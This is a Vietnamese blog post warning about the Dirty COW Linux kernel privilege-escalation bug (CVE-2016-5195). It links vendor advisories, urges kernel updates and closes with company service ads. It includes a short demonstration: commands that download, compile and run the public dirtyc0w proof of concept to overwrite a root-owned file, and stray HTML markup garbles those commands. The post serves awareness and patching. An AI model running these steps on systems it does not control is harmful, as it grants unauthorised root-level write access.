Dirty COW - Lỗi bảo mật mới trên hệ điều hành Linux
Vừa qua, trong lúc soạn giáo trình cho khóa học Magento 2, mình có nhận được một cảnh báo về lỗi bảo mật mới trong các hệ điều hành Linux là lỗi CVE-2016-5195, hay còn được gọi là Dirty COW (mới được fix vào ngày 18/10/2016)
Nó là lỗi trong Linux Kernel, cho phép một local user lấy được quyền của root user. Mình có thử nghiệm lại theo các hướng dẫn trên mạng và thấy trên server của mình cũng có dính lỗi này (local server Ubuntu và Debian) và theo như cảnh báo thì hầu hết các hệ điều hành Linux đều dính. Do đó những ai đang sử dụng server Linux thì nên cập nhật lại Kernel của server càng sớm càng tốt, còn nếu dùng shared hosting thì nên liên hệ với nhà cung cấp để đảm bảo website của mình được an toàn.
- Red Hat / CentOS: https://access.redhat.com/security/cve/cve-2016-5195
- Debian: https://security-tracker.debian.org/tracker/CVE-2016-5195
- Ubuntu: http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-5195.html
- SUSE: https://www.suse.com/security/cve/CVE-2016-5195.html
Một số trường hợp tấn công cụ thể các bạn có thể xem ở đây: https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs
Sau đây là các bước mình thử nghiệm trên server ảo Debian 8, dùng một user thường thay đổi nội dung 1 file mà chỉ có quyền đọc.
– Đầu tiên ssh vào server với tài khoản root và tạo 1 file bất kỳ ví dụ root_file

– Sau đó chuyển qua 1 tài khoản thường, ví dụ robin. Thử đọc file và ghi nội dung vào file

– Dùng Dirty COW để thay đổi nội dung file
1
2
3
4
5
|
$ curl - < span class = "hljs-type" > O < / span > https : < span class = "hljs-comment" > //raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c</span>
$ gcc - pthread dirtyc0w . < span class = "hljs-built_in" > c < / span > - o dirtyc0w
$ . / dirtyc0w root_file < span class = "hljs-string" > "Hacked by Robin !!!" < / span >
|
– Và kết quả

* Viết ứng dụng cho smartphone và máy tính bảng: iPhone, iPad , Android, Tablet, Windows Phone, Blackberry, Uber app, Grab app, mạng xã hội, vận tải thông minh, thực tế ảo, game mobile,...
* Viết ứng dụng tìm và đặt xe, các hệ thống theo mô hình kinh tế chia sẻ, uber for x, ứng dụng giúp việc,...
* Xây dựng các giải pháp quản lý vận tải, quản lý xe công vụ, quản lý xe doanh nghiệp, phần mềm và ứng dụng logistics, kho vận, vé xe điện tử,...
* Tư vấn và xây dựng mạng xã hội, tư vấn giải pháp CNTT cho doanh nghiệp, startup, ...
Quý khách xem Hồ sơ năng lực của DVMS tại đây >>
Quý khách gửi yêu cầu tư vấn và báo giá tại đây >>